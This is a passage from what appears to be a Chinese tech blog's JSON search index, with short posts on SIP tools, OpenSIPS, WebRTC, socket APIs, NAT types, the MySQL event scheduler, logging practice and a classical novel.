IP数据报最大为1500字节,减去20字节IP首部,8字节UDP首部,留给UDP应用数据的只有1472字节。","title":"1 概述"},{"content":"相比于sngrep, Homer能够保存从历史记录中搜索SIP包信息。除此以外,Homer可以很方便的与OpenSIPS或FS进行集成。\n最精简版本的Homer部署需要三个服务。\npostgres 数据库,用来存储SIP信息 heplify-server 用来处理Hep消息,存储到数据库 homer-app 前端搜索查询界面 这三个服务都可以用docker镜像的方式部署,非常方便。\n说实话:homer实际上并不好用。你可以对比一下siphub就知道了。\n参考资料 https://blog.opensips.org/2017/03/22/capturing-beyond-sip/https://www.opensips.org/Documentation/Tutorials-Tracing\n","permalink":"https://wdd.js.org/opensips/tools/homer/","summary":"相比于sngrep, Homer能够保存从历史记录中搜索SIP包信息。除此以外,Homer可以很方便的与OpenSIPS或FS进行集成。\n最精简版本的Homer部署需要三个服务。\npostgres 数据库,用来存储SIP信息 heplify-server 用来处理Hep消息,存储到数据库 homer-app 前端搜索查询界面 这三个服务都可以用docker镜像的方式部署,非常方便。\n说实话:homer实际上并不好用。你可以对比一下siphub就知道了。\n参考资料 https://blog.opensips.org/2017/03/22/capturing-beyond-sip/https://www.opensips.org/Documentation/Tutorials-Tracing","title":"homer: 统一的sip包集中处理工具"},{"content":"1 面向连接和面向非连接的区别? 面向连接与面向非连接并不是指的物理介质,而是指的分组数据包。而实际上,连接只是一个虚拟的概念。\n数据在发送前,会被分组发送。对于面向连接的协议来说,每个分组之间都有顺序的,分组会存储自己的位置信息。\n可以理解在同一时间只维持一段关系。\n面向非连接协议,分组直接并无任何关系,每个分组都是相互独立的。可以理解为脚踏多条船。\n","permalink":"https://wdd.js.org/network/kttu4i/","summary":"1 面向连接和面向非连接的区别? 
面向连接与面向非连接并不是指的物理介质,而是指的分组数据包。而实际上,连接只是一个虚拟的概念。\n数据在发送前,会被分组发送。对于面向连接的协议来说,每个分组之间都有顺序的,分组会存储自己的位置信息。\n可以理解为在同一时间只维持一段关系。\n面向非连接协议,分组之间并无任何关系,每个分组都是相互独立的。可以理解为脚踏多条船。","title":"技巧1"},{"content":"套接字API SOCKET socket(int domain, int type, int protocol) Socket API和协议无关,即可以用来创建Socket,无论是TCP还是UDP,还是进程间的通信,都可以用这个接口创建。\ndomain 表示通信域,最常见的有以下两个域 AF_INET 因特网通信 AF_LOCAL 进程间通信 type 表示套接字的类型 SOCK_STREAM 可靠的、全双工、面向连接的,实际上就是我们熟悉的TCP SOCK_DGRAM 不可靠、尽力而为的,无连接的。实际上指的就是UDP SOCK_RAW 允许对IP层的数据进行访问。用于特殊目的,例如ICMP protocol 表示具体通信协议 TCP/IP 本自同根生!\n","permalink":"https://wdd.js.org/network/base-socket/","summary":"套接字API SOCKET socket(int domain, int type, int protocol) Socket API和协议无关,即可以用来创建Socket,无论是TCP还是UDP,还是进程间的通信,都可以用这个接口创建。\ndomain 表示通信域,最常见的有以下两个域 AF_INET 因特网通信 AF_LOCAL 进程间通信 type 表示套接字的类型 SOCK_STREAM 可靠的、全双工、面向连接的,实际上就是我们熟悉的TCP SOCK_DGRAM 不可靠、尽力而为的,无连接的。实际上指的就是UDP SOCK_RAW 允许对IP层的数据进行访问。用于特殊目的,例如ICMP protocol 表示具体通信协议 TCP/IP 本自同根生!","title":"基本套接字API回顾"},{"content":"","permalink":"https://wdd.js.org/posts/2019/11/bhbmum/","summary":"","title":"所有的古镇都是一个样[todo]"},{"content":" 今天打开语雀,发现已经有了会员功能。说实在的,相比普通用户,会员的优势并不大。除非你是哪种重度文字控患者,10个知识库并不够你用了。\n我在出现会员服务之前,已经有了多于10个知识库。\n相比于免费服务,我更喜欢付费的服务。免费的服务永远是最贵的服务。\n很多人,可以买爱奇艺的会员、优酷视频、腾讯视频、京东会员,但是往往对于能够真正提升自己能力的投资,往往安于免费,不忍付出。\n除非是动辄几千的会员,我会考虑自己是否真正需要。一百左右的年费会员,在上海,也就是喝三四杯奶茶的价钱。\n所以,我就买了会员。\n买了会员有什么感觉,感觉我可能会多创建几个知识库吧。\n","permalink":"https://wdd.js.org/posts/2019/11/gonmzq/","summary":"今天打开语雀,发现已经有了会员功能。说实在的,相比普通用户,会员的优势并不大。除非你是哪种重度文字控患者,10个知识库并不够你用了。\n我在出现会员服务之前,已经有了多于10个知识库。\n相比于免费服务,我更喜欢付费的服务。免费的服务永远是最贵的服务。\n很多人,可以买爱奇艺的会员、优酷视频、腾讯视频、京东会员,但是往往对于能够真正提升自己能力的投资,往往安于免费,不忍付出。\n除非是动辄几千的会员,我会考虑自己是否真正需要。一百左右的年费会员,在上海,也就是喝三四杯奶茶的价钱。\n所以,我就买了会员。\n买了会员有什么感觉,感觉我可能会多创建几个知识库吧。","title":"买了语雀会员是怎样体验?"},{"content":"WebRTC 功能 音频视频通话 视频会议 数据传输 WebRTC 架构 对等实体之间通过信令服务传递信令 对等实体之间的媒体流可以直接传递,无需中间服务器 内部结构 紫色部分是Web开发者API层 蓝色实线部分是面向浏览器厂商的API层 蓝色虚线部分浏览器厂商可以自定义实现 WebRTC有三个模块:\nVoice Engine(音频引擎) Voice Engine包含iSAC/iLBC Codec(音频编解码器,前者是针对宽带和超宽带,后者是针对窄带) NetEQ for 
voice(处理网络抖动和语音包丢失) Echo Canceler(回声消除器)/ Noise Reduction(噪声抑制) Video Engine(视频引擎) VP8 Codec(视频图像编解码器) Video jitter buffer(视频抖动缓冲器,处理视频抖动和视频信息包丢失) Image enhancements(图像质量增强) Transport SRTP(安全的实时传输协议,用以音视频流传输) Multiplexing(多路复用) P2P,STUN+TURN+ICE(用于NAT网络和防火墙穿越的) 除此之外,安全传输可能还会用到DTLS(数据报安全传输),用于加密传输和密钥协商 整个WebRTC通信是基于UDP的 WebRTC 如何通信 getUserMedia用来捕获本地的语音流或者视频流 RTCPeerConnection用来代表WebRTC链接,用来处理对等实体之间的流数据 RTCDataChannel 用来传递各种数据 WebRTC 的核心组件 音视频引擎:OPUS、VP8 / VP9、H264 传输层协议:底层传输协议为 UDP 媒体协议:SRTP / SRTCP 数据协议:DTLS / SCTP P2P 内网穿透:STUN / TURN / ICE / Trickle ICE 信令与 SDP 协商:HTTP / WebSocket / SIP、 Offer Answer 模型 WebRTC 音频和视频引擎 最底层是硬件设备,上面是音频捕获模块和视频捕获模块 中间部分为音视频引擎。音频引擎负责音频采集和传输,具有降噪、回声消除等功能。视频引擎负责网络抖动优化,互联网传输编解码优化 在音视频引擎之上是 一套 C++ API,在 C++ 的 API 之上是提供给浏览器的Javascript API WebRTC 底层协议 WebRTC 核心的协议都是在右侧基于 UDP 基础上搭建起来的 其中,ICE、STUN、TURN 用于内网穿透, 解决了获取与绑定外网映射地址,以及 keep alive 机制 DTLS 用于对传输内容进行加密,可以看做是 UDP 版的 TLS。由于 WebRTC 对安全比较重视,这一层是必须的。所有WebRTC组件都必须加密,并且其JavaScript API只能用于安全源(HTTPS或本地主机)。信令机制并不是由WebRTC标准定义的,所以您必须确保使用安全协议。 SRTP 与 SRTCP 是对媒体数据的封装与传输控制协议 SCTP 是流控制传输协议,提供类似 TCP 的特性,SCTP 可以基于 UDP 上构建,在 WebRTC 里是在 DTLS 协议之上 RTCPeerConnection 用来建立和维护端到端连接,并提供高效的音视频流传输 RTCDataChannel 用来支持端到端的任意二进制数据传输 WebRTC 协议栈解释 ICE:互动式连接建立(RFC 5245) STUN:用于NAT的会话遍历实用程序(RFC 5389) TURN:在NAT周围使用继电器进行遍历(RFC 5766) SDP:会话描述协议(RFC 4566) DTLS:数据报传输层安全性(RFC 6347) SCTP:流控制传输协议(RFC 4960) SRTP:安全实时传输协议(RFC 3711) 浏览器和某些非浏览器之间的呼叫,有些时候以为没有DTLS指纹,而导致呼叫失败。如下图使用JsSIP, 一个sipPhone和WebRTC之间的呼叫,因为没有携带DTLS指纹而导致呼叫失败。\nemit \u0026ldquo;peerconnection:setremotedescriptionfailed\u0026rdquo; [error**:DOMException:**** Failed to execute \u0026lsquo;setRemoteDescription\u0026rsquo; on \u0026lsquo;RTCPeerConnection\u0026rsquo;:**** Failed to set remote offer sdp****:**** Called with SDP without DTLS fingerprint.**\n一个完整的SIP INVITE信令。其中a=fingerprint:sha-256字段表示DTLS指纹。\na=fingerprint:sha-256 74:CD:F4:A0:3B:46:01:1C:0C:5D:04:D0:17:E5:A4:A1:04:35:97:1C:34:A3:61:60:79:52:02:F3:05:9E:7D:FE\nSDP: Session Description Protocol 
SDP协议用来协商两个SIP UA之间能力,例如媒体编解码能力。sdp协议举例。sdp协议的详细介绍可以参考 RFC4566\nv=0 o=- 7158718066157017333 2 IN IP4 127.0.0.1 s=- t=0 0 a=group:BUNDLE 0 a=msid-semantic: WMS byn72RFJBCUzdSPhnaBU4vSz7LFwfwNaF2Sy m=audio 64030 UDP/TLS/RTP/SAVPF 111 103 104 9 0 8 106 105 13 110 112 113 126 c=IN IP4 192.168.2.180 Protocol Version (\u0026ldquo;v=\u0026rdquo;) Origin (\u0026ldquo;o=\u0026rdquo;) Session Name (\u0026ldquo;s=\u0026rdquo;) Session Information (\u0026ldquo;i=\u0026rdquo;) URI (\u0026ldquo;u=\u0026rdquo;) Email Address and Phone Number (\u0026ldquo;e=\u0026rdquo; and \u0026ldquo;p=\u0026rdquo;) Connection Data (\u0026ldquo;c=\u0026rdquo;) Bandwidth (\u0026ldquo;b=\u0026rdquo;) Timing (\u0026ldquo;t=\u0026rdquo;) Repeat Times (\u0026ldquo;r=\u0026rdquo;) Time Zones (\u0026ldquo;z=\u0026rdquo;) Encryption Keys (\u0026ldquo;k=\u0026rdquo;) Attributes (\u0026ldquo;a=\u0026rdquo;) Media Descriptions (\u0026ldquo;m=\u0026rdquo;) 加密 WebRTC对安全性是要求非常高的。无论是信令还是与语音流,WebRTC要求信息传递必须加密。\n数据流使用DTLS协议 媒体流使用SRTP JavaScript API getUserMedia():捕捉音频和视频 RTCPeerConnection:在用户之间流式传输音频和视频 RTCDataChannel:在用户之间传输数据 MediaRecorder:录制音频和视频 参考 WebRTC官网 WebRTC中文网 一步一步学习WebRTC A Study of WebRTC Security ","permalink":"https://wdd.js.org/opensips/ch9/notes/","summary":"WebRTC 功能 音频视频通话 视频会议 数据传输 WebRTC 架构 对等实体之间通过信令服务传递信令 对等实体之间的媒体流可以直接传递,无需中间服务器 内部结构 紫色部分是Web开发者API层 蓝色实线部分是面向浏览器厂商的API层 蓝色虚线部分浏览器厂商可以自定义实现 WebRTC有三个模块:\nVoice Engine(音频引擎) Voice Engine包含iSAC/iLBC Codec(音频编解码器,前者是针对宽带和超宽带,后者是针对窄带) NetEQ for voice(处理网络抖动和语音包丢失) Echo Canceler(回声消除器)/ Noise Reduction(噪声抑制) Video Engine(视频引擎) VP8 Codec(视频图像编解码器) Video jitter buffer(视频抖动缓冲器,处理视频抖动和视频信息包丢失) Image enhancements(图像质量增强) Transport SRTP(安全的实时传输协议,用以音视频流传输) Multiplexing(多路复用) P2P,STUN+TURN+ICE(用于NAT网络和防火墙穿越的) 除此之外,安全传输可能还会用到DTLS(数据报安全传输),用于加密传输和密钥协商 整个WebRTC通信是基于UDP的 WebRTC 如何通信 getUserMedia用来捕获本地的语音流或者视频流 RTCPeerConnection用来代表WebRTC链接,用来处理对等实体之间的流数据 RTCDataChannel 用来传递各种数据 WebRTC 的核心组件 音视频引擎:OPUS、VP8 / VP9、H264 传输层协议:底层传输协议为 UDP 媒体协议:SRTP / SRTCP 
数据协议:DTLS / SCTP P2P 内网穿透:STUN / TURN / ICE / Trickle ICE 信令与 SDP 协商:HTTP / WebSocket / SIP、 Offer Answer 模型 WebRTC 音频和视频引擎 最底层是硬件设备,上面是音频捕获模块和视频捕获模块 中间部分为音视频引擎。音频引擎负责音频采集和传输,具有降噪、回声消除等功能。视频引擎负责网络抖动优化,互联网传输编解码优化 在音视频引擎之上是 一套 C++ API,在 C++ 的 API 之上是提供给浏览器的Javascript API WebRTC 底层协议 WebRTC 核心的协议都是在右侧基于 UDP 基础上搭建起来的 其中,ICE、STUN、TURN 用于内网穿透, 解决了获取与绑定外网映射地址,以及 keep alive 机制 DTLS 用于对传输内容进行加密,可以看做是 UDP 版的 TLS。由于 WebRTC 对安全比较重视,这一层是必须的。所有WebRTC组件都必须加密,并且其JavaScript API只能用于安全源(HTTPS或本地主机)。信令机制并不是由WebRTC标准定义的,所以您必须确保使用安全协议。 SRTP 与 SRTCP 是对媒体数据的封装与传输控制协议 SCTP 是流控制传输协议,提供类似 TCP 的特性,SCTP 可以基于 UDP 上构建,在 WebRTC 里是在 DTLS 协议之上 RTCPeerConnection 用来建立和维护端到端连接,并提供高效的音视频流传输 RTCDataChannel 用来支持端到端的任意二进制数据传输 WebRTC 协议栈解释 ICE:互动式连接建立(RFC 5245) STUN:用于NAT的会话遍历实用程序(RFC 5389) TURN:在NAT周围使用继电器进行遍历(RFC 5766) SDP:会话描述协议(RFC 4566) DTLS:数据报传输层安全性(RFC 6347) SCTP:流控制传输协议(RFC 4960) SRTP:安全实时传输协议(RFC 3711) 浏览器和某些非浏览器之间的呼叫,有些时候以为没有DTLS指纹,而导致呼叫失败。如下图使用JsSIP, 一个sipPhone和WebRTC之间的呼叫,因为没有携带DTLS指纹而导致呼叫失败。","title":"WebRTC简介"},{"content":"目前在做基于WebRTC的语音和视频终端,语音和视频通话的质量都不错。感谢WebRTC,站在巨人的肩膀上,我们可以看得更远。\nWebRTC浏览器兼容性 github demos 下面两个都是github项目,项目中有各种WebRTC的demo。除了demo之外,这两个项目的issuese也是非常值得看的,可以解决常见的问题\nhttps://webrtc.github.io/samples/ https://github.com/muaz-khan/WebRTC-Experiment 相关资料网站 webrtc官网: https://webrtc.org/ webrtchacks: https://webrtchacks.com/ webrtc官网: https://webrtc.org.cn/ webrtc安全相关: http://webrtc-security.github.io/ webrtc谷歌开发者教程: https://codelabs.developers.google.com/codelabs/webrtc-web/ sdp for webrtc https://tools.ietf.org/id/draft-nandakumar-rtcweb-sdp-01.html 各种资料 https://webrtc.org/start/ https://www.w3.org/TR/webrtc/ 浏览器内核 webkit官网:https://webkit.org/ WebRTC相关库 webrtc-adapter https://github.com/webrtchacks/adapter WebRTC周边js库 库 地址 Addlive http://www.addlive.com/platform-overview/ Apidaze https://developers.apidaze.io/webrtc Bistri http://developers.bistri.com/webrtc-sdk/#js-sdk Crocodile https://www.crocodilertc.net/documentation/javascript/ EasyRTC http://www.easyrtc.com/docs/ Janus 
http://janus.conf.meetecho.com/docs/JS.html JsSIP http://jssip.net/documentation/ Openclove http://developer.openclove.com/docs/read/ovxjs_api_doc Oracle http://docs.oracle.com/cd/E40972_01/doc.70/e49239/index.html Peerjs http://peerjs.com/docs/#api Phono http://phono.com/docs Plivo https://plivo.com/docs/sdk/web/ Pubnub http://www.pubnub.com/docs/javascript/javascript-sdk.html Quobis https://quobis.atlassian.net/wiki/display/QoffeeSIP/API SimpleWebRTC from \u0026amp;Yet http://simplewebrtc.com/ SIPML5 http://sipml5.org/docgen/symbols/SIPml.html TenHands https://www.tenhands.net/developer/docs.htm TokBox http://tokbox.com/opentok Twilio http://www.twilio.com/client/api Voximplant http://voximplant.com/docs/references/websdk/ Vline https://vline.com/developer/docs/vline.js/ Weemo http://docs.weemo.com/js/ Xirsys http://xirsys.com/_static_content/xirsys.com/docs/ Xsockets.net http://xsockets.net/docs/javascript-client-api VoIP/PSTN https://kamailio.org https://freeswitch.org/ 值得关注的人 https://github.com/muaz-khan https://github.com/chadwallacehart https://github.com/fippo WebRTC主题 github上webrtc主题相关的仓库,干货非常多 https://github.com/topics/webrtc\n相关文章 guide-to-safari-webrtc WebKit: On the Road to WebRTC 1.0, Including VP8 whats-in-a-webrtc-javascript-library ","permalink":"https://wdd.js.org/opensips/ch9/webrtc-ref/","summary":"目前在做基于WebRTC的语音和视频终端,语音和视频通话的质量都不错。感谢WebRTC,站在巨人的肩膀上,我们可以看得更远。\nWebRTC浏览器兼容性 github demos 下面两个都是github项目,项目中有各种WebRTC的demo。除了demo之外,这两个项目的issuese也是非常值得看的,可以解决常见的问题\nhttps://webrtc.github.io/samples/ https://github.com/muaz-khan/WebRTC-Experiment 相关资料网站 webrtc官网: https://webrtc.org/ webrtchacks: https://webrtchacks.com/ webrtc官网: https://webrtc.org.cn/ webrtc安全相关: http://webrtc-security.github.io/ webrtc谷歌开发者教程: https://codelabs.developers.google.com/codelabs/webrtc-web/ sdp for webrtc https://tools.ietf.org/id/draft-nandakumar-rtcweb-sdp-01.html 各种资料 https://webrtc.org/start/ https://www.w3.org/TR/webrtc/ 浏览器内核 webkit官网:https://webkit.org/ WebRTC相关库 
webrtc-adapter https://github.com/webrtchacks/adapter WebRTC周边js库 库 地址 Addlive http://www.addlive.com/platform-overview/ Apidaze https://developers.apidaze.io/webrtc Bistri http://developers.bistri.com/webrtc-sdk/#js-sdk Crocodile https://www.crocodilertc.net/documentation/javascript/ EasyRTC http://www.easyrtc.com/docs/ Janus http://janus.conf.meetecho.com/docs/JS.html JsSIP http://jssip.net/documentation/ Openclove http://developer.openclove.com/docs/read/ovxjs_api_doc Oracle http://docs.oracle.com/cd/E40972_01/doc.70/e49239/index.html Peerjs http://peerjs.com/docs/#api Phono http://phono.com/docs Plivo https://plivo.com/docs/sdk/web/ Pubnub http://www.pubnub.com/docs/javascript/javascript-sdk.html Quobis https://quobis.atlassian.net/wiki/display/QoffeeSIP/API SimpleWebRTC from \u0026amp;Yet http://simplewebrtc.com/ SIPML5 http://sipml5.org/docgen/symbols/SIPml.html TenHands https://www.tenhands.net/developer/docs.htm TokBox http://tokbox.","title":"WebRTC学习资料分享"},{"content":"1. OpenSIPS架构 OpenSIPS主要由两部分构成:\ncore: 提供底层工具、接口、资源 module:模块是一些共享的库,在启动时按需加载。有些模块是用于在opensips脚本中提供功能,而有些模块是作为底层,为其他模块提供功能。 2. OpenSIPS 核心 2.1. 传输层 传输层提供了对于各种协议的支持,如TCP、UDP、TLS、WebSocket\n2.2. SIP工厂层 SIP工厂层提供了对SIP协议的解析和构建。OpenSIPS实现了一种懒解析功能,懒解析的效率非常高。\n懒解析:懒解析就是只去解析SIP头,并不解析SIP头的字段内容。而是在需要读取头字段内容时,才去解析。所以可以理解为按需解析。有点类似于一些文件系统的写时复制功能。\n**惰性应用:**有一点非常重要,当你通过脚本提供的函数去改变SIP消息时,所作出的改变并不是实时作用到SIP消息上,而是先存起来,当所有的SIP消息处理完成后才会去应用这些改变。举例来说,你首先通过函数给SIP消息添加了某个头,然后你通过函数去获取这个头时,发现这个头并不存在,但是SIP消息在发送出去后,又携带了你添加的这个头。\n2.3. 路由脚本解析与执行 OpenSIPS在启动后,会将opensips.cfg解析并加载到内存中。一旦OpenSIPS正常运行了,opensips.cfg文件即使删了也不会影响到OpenSIPS的运行了。\n但是OpenSIPS并不支持脚本热更新,如果你改了脚本,想让正在运行的OpenSIPS具有新添加的功能,那么必须将OpenSIPS重启。\nOpenSIPS的脚本有点类似于C或者Shell语言,如果你Shell写的很溜,OpenSIPS的脚本理解起来也会非常容易。\n2.4. 内存与锁管理 出于性能考虑,OpenSIPS自己内部实现了内存和锁的管理,这部分内容在脚本中是不可见的。\n2.5. 脚本变量和脚本函数 OpenSIPS核心提供的脚本变量和函数比较有限,外围的模块提供了很多的变量和函数。这些变量和函数的存在,都是为了让你易于获取SIP消息的某些字段,或者对SIP消息进行修改。\n2.6. SQL接口类 OpenSIPS 核心实现了接口的定义,但是并没有实现接口。接口的实现由外部的模块提供,这样做的好处是可以使用不同的数据库。\n2.7. 
MI管理接口 mi接口用来管理OpenSIPS, 可以实现以下功能\n向OpenSIPS 发送数据 从OpenSIPS 获取数据 触发OpenSIPS 的内部行为 ","permalink":"https://wdd.js.org/opensips/ch3/about-opensips/","summary":"1. OpenSIPS架构 OpenSIPS主要由两部分构成:\ncore: 提供底层工具、接口、资源 module:模块是一些共享的库,在启动时按需加载。有些模块是用于在opensips脚本中提供功能,而有些模块是作为底层,为其他模块提供功能。 2. OpenSIPS 核心 2.1. 传输层 传输层提供了对于各种协议的支持,如TCP、UDP、TLS、WebSocket\n2.2. SIP工厂层 SIP工厂层提供了对SIP协议的解析和构建。OpenSIPS实现了一种懒解析功能,懒解析的效率非常高。\n懒解析:懒解析就是只去解析SIP头,并不解析SIP头的字段内容。而是在需要读取头字段内容时,才去解析。所以可以理解为按需解析。有点类似于一些文件系统的写时复制功能。\n**惰性应用:**有一点非常重要,当你通过脚本提供的函数去改变SIP消息时,所作出的改变并不是实时作用到SIP消息上,而是先存起来,当所有的SIP消息处理完成后才会去应用这些改变。举例来说,你首先通过函数给SIP消息添加了某个头,然后你通过函数去获取这个头时,发现这个头并不存在,但是SIP消息在发送出去后,又携带了你添加的这个头。\n2.3. 路由脚本解析与执行 OpenSIPS在启动后,会将opensips.cfg解析并加载到内存中。一旦OpenSIPS正常运行了,opensips.cfg文件即使删了也不会影响到OpenSIPS的运行了。\n但是OpenSIPS并不支持脚本热更新,如果你改了脚本,想让正在运行的OpenSIPS具有新添加的功能,那么必须将OpenSIPS重启。\nOpenSIPS的脚本有点类似于C或者Shell语言,如果你Shell写的很溜,OpenSIPS的脚本理解起来也会非常容易。\n2.4. 内存与锁管理 出于性能考虑,OpenSIPS自己内部实现了内存和锁的管理,这部分内容在脚本中是不可见的。\n2.5. 脚本变量和脚本函数 OpenSIPS核心提供的脚本变量和函数比较有限,外围的模块提供了很多的变量和函数。这些变量和函数的存在,都是为了让你易于获取SIP消息的某些字段,或者对SIP消息进行修改。\n2.6. SQL接口类 OpenSIPS 核心实现了接口的定义,但是并没有实现接口。接口的实现由外部的模块提供,这样做的好处是可以使用不同的数据库。\n2.7. 
MI管理接口 mi接口用来管理OpenSIPS, 可以实现以下功能\n向OpenSIPS 发送数据 从OpenSIPS 获取数据 触发OpenSIPS 的内部行为 ","title":"opensips介绍"},{"content":"从MySql5.1.6增加计划任务功能\n判断计划任务是否启动 SHOW VARIABLES LIKE \u0026#39;event_scheduler\u0026#39; 开启计划任务 set global event_scheduler=on 创建计划任务 create event test_e on schedule every 1 day do sql 修改计划任务 # 临时关闭事件 ALTER EVENT e_test DISABLE; # 开启事件 ALTER EVENT e_test ENABLE; # 将每天清空test表改为5天清空一次 ALTER EVENT e_test ON SCHEDULE EVERY 5 DAY; 删除计划任务 drop event e_test ","permalink":"https://wdd.js.org/posts/2019/11/xss1vk/","summary":"从MySql5.1.6增加计划任务功能\n判断计划任务是否启动 SHOW VARIABLES LIKE \u0026#39;event_scheduler\u0026#39; 开启计划任务 set global event_scheduler=on 创建计划任务 create event test_e on schedule every 1 day do sql 修改计划任务 # 临时关闭事件 ALTER EVENT e_test DISABLE; # 开启事件 ALTER EVENT e_test ENABLE; # 将每天清空test表改为5天清空一次 ALTER EVENT e_test ON SCHEDULE EVERY 5 DAY; 删除计划任务 drop event e_test ","title":"Mysql计划任务:Event Scheduler"},{"content":" NAT的产生原因是IPv4的地址不够用,网络中的部分主机只能公用一个外网IP。 NAT工作在网络层和传输层,主要是对IP地址和端口号的改变 NAT的优点 节约公网IP 安全性更好,所有流量都需要经过入口的防火墙 NAT的缺点 对于UDP应用不够友好 NAT 工作原理 内部的设备X, 经过NAT设备后,NAT设备会改写源IP和端口 NAT 类型 1. 全锥型 每个内部主机都有一个静态绑定的外部ip:port 任何主机发往NAT设备上特定ip:port的包,都会被转发给绑定的主机 这种方式的缺点很明显,黑客可以使用端口扫描工具,扫描出暴露的端口,然后通过这个端口攻击内部主机 在内部主机没有往外发送流量时,外部流量也能够进入内部主机 -\n2. 限制锥形 NAT上的ip:port与内部主机是动态绑定的 如果内部主机没有向某个主机先发送过包,那么NAT会拒绝外部主机进入的流量 3. 端口限制型 端口限制型除了有限制锥型的要求外,还增加了端口的限制 4. 对称型 对称型最难穿透,因为每次交互NAT都会使用不同的端口号,所以内外网端口映射根本无法预测 NAT对比表格 NAT类型 收数据前是否需要先发送数据 是否能够预测下一次的NAT打开的端口对 是否限制包的目的ip:port 全锥形 否 是 否 限制锥形 是 是 仅限制IP 端口限制型 是 是 是 对称型 是 否 是 ","permalink":"https://wdd.js.org/opensips/ch1/deep-in-nat/","summary":" NAT的产生原因是IPv4的地址不够用,网络中的部分主机只能公用一个外网IP。 NAT工作在网络层和传输层,主要是对IP地址和端口号的改变 NAT的优点 节约公网IP 安全性更好,所有流量都需要经过入口的防火墙 NAT的缺点 对于UDP应用不够友好 NAT 工作原理 内部的设备X, 经过NAT设备后,NAT设备会改写源IP和端口 NAT 类型 1. 全锥型 每个内部主机都有一个静态绑定的外部ip:port 任何主机发往NAT设备上特定ip:port的包,都会被转发给绑定的主机 这种方式的缺点很明显,黑客可以使用端口扫描工具,扫描出暴露的端口,然后通过这个端口攻击内部主机 在内部主机没有往外发送流量时,外部流量也能够进入内部主机 -\n2. 限制锥形 NAT上的ip:port与内部主机是动态绑定的 如果内部主机没有向某个主机先发送过包,那么NAT会拒绝外部主机进入的流量 3. 
端口限制型 端口限制型除了有限制锥型的要求外,还增加了端口的限制 4. 对称型 对称型最难穿透,因为每次交互NAT都会使用不同的端口号,所以内外网端口映射根本无法预测 NAT对比表格 NAT类型 收数据前是否需要先发送数据 是否能够预测下一次的NAT打开的端口对 是否限制包的目的ip:port 全锥形 否 是 否 限制锥形 是 是 仅限制IP 端口限制型 是 是 是 对称型 是 否 是 ","title":"深入NAT网络"},{"content":"如果你仅仅是本地运行OpenSIPS, 你可以不用管什么对外公布地址。但是如果你的SIP服务器想在公网环境提供服务,则必然要深刻的理解对外公布地址。\n在一个集群中,可能有多台SIP服务器,例如如下图的网络架构中\nregister 负责注册相关的业务 192.168.1.100(内网) uas 负责呼叫相关的业务 192.168.1.101(内网) entry 负责接入 192.168.1.102(内网),1.2.3.4(公网地址) 一般情况下,register和uas只有内网地址,没有公网地址。而entry既有内网地址,也有公网地址。公网地址一般是由云服务提供商分配的。\n我们希望内部网络register和uas以及entry必须使用内网通信,而entry和互联网使用公网通信。\n有时候经常遇到的问题就是某个请求,例如INVITE, uas从内网地址发送到了entry的公网地址上,这时候就可能产生一系列的奇葩问题。\n如何设置公布地址 listen as listen = udp:192.168.1.102:5060 as 1.2.3.4:5060 在listen 
的参数上直接配置公布地址。好处是方便,后续如果调用record_route()或者add_path_received(), OpenSIPS会自动帮你选择对外公布地址。\n但是,OpenSIPS选择可能并不是我们想要的。\n例如: INVITE请求从内部发送到互联网,这时OpenSIPS能正常设置对外公布地址。但是如果请求从外部进入内部,OpenSIPS可能还是会用公网地址作为对外公布地址。\n所以,listen as虽然方便,但不够灵活。\nset_advertised_address() 和 set_advertised_port(int) set_advertised_address和set_advertised_port属于OpenSIPS的核心函数部分,可以在脚本里根据不同条件,灵活的设置公布地址。\n例如:\nif 请求发送到公网 { set_advertised_address(\u0026#34;1.2.3.4\u0026#34;); } ⚠️ 如果你选择用set_advertised_address和set_advertised_port来手动设置,就千万不要用as了。\n几个需要注意的SIP头 record_route头 Path头 上面的两个头,在OpenSIPS里可以用下面的函数去设置。设置的时候,务必要注意选择合适的网络地址。否则请求将不会按照你期望的方式发送。\nrecord_route record_route_preset add_path add_path_received ","permalink":"https://wdd.js.org/opensips/ch5/adv-address/","summary":"如果你仅仅是本地运行OpenSIPS, 你可以不用管什么对外公布地址。但是如果你的SIP服务器想在公网环境提供服务,则必然要深刻的理解对外公布地址。\n在一个集群中,可能有多台SIP服务器,例如如下图的网络架构中\nregister 负责注册相关的业务 192.168.1.100(内网) uas 负责呼叫相关的业务 192.168.1.101(内网) entry 负责接入 192.168.1.102(内网),1.2.3.4(公网地址) 一般情况下,register和uas只有内网地址,没有公网地址。而entry既有内网地址,也有公网地址。公网地址一般是由云服务提供商分配的。\n我们希望内部网络register和uas以及entry必须使用内网通信,而entry和互联网使用公网通信。\n有时候经常遇到的问题就是某个请求,例如INVITE, uas从内网地址发送到了entry的公网地址上,这时候就可能产生一系列的奇葩问题。\n如何设置公布地址 listen as listen = udp:192.168.1.102:5060 as 1.2.3.4:5060 在listen ","title":"【必读】深入对外公布地址"},{"content":"下面的日志是打印出socket.io断开的信息\n// bad logger.info(`socket.io ${socket.handshake.query.agentId} disconnect. reason: ${reason} ${socket.id}`) 但是这条日志不利于关键词搜索,如果搜disconnect,那么可能很多地方都有这个关键词。\n// good logger.info(`socket.io disconnect ${socket.handshake.query.agentId} reason: ${reason} ${socket.id}`) // bad logger.info(`socket.io ${socket.handshake.query.agentId} disconnect. reason: ${reason} ${socket.id}`) 总结经验\n多个关键词位置要靠前 多个关键词要集中 日志要标记来自特殊的用途,比如说,来自 ","permalink":"https://wdd.js.org/posts/2019/11/xa694b/","summary":"下面的日志是打印出socket.io断开的信息\n// bad logger.info(`socket.io ${socket.handshake.query.agentId} disconnect. 
reason: ${reason} ${socket.id}`) 总结经验\n多个关键词位置要靠前 多个关键词要集中 日志要标记来自特殊的用途,比如说,来自 ","title":"打印易于提取关键词的日志"},{"content":" 五大单元 输入单元 CPU:算术,逻辑,内存 输出单元 指令集 精简指令集 复杂指令集 ","permalink":"https://wdd.js.org/posts/2019/11/qy6ugu/","summary":" 五大单元 输入单元 CPU:算术,逻辑,内存 输出单元 指令集 精简指令集 复杂指令集 ","title":"Linux私房菜"},{"content":"《镜花缘》是清代李汝珍写的一部长篇小说,小说前半部分是主角游历海外各国的神奇经历,有点像日本动漫海贼王。后半部分比较无趣,略过不提。\n单讲小说的前半部分,小说发生在唐代,主角叫做唐敖,本来科举中了探花,但是因为他和讨伐武则天的徐敬业有结拜之交,被人告发,遂革去了探花,降为秀才。\n唐敖心灰意冷,煮熟的鸭子就这么飞了。于是决定舍弃功名,游历山水。正好他的妹夫,林之洋是个跑远洋贸易的。\n唐敖正好搭上了妹夫的顺风船,环游世界之旅就这么开始了!!\n1. 
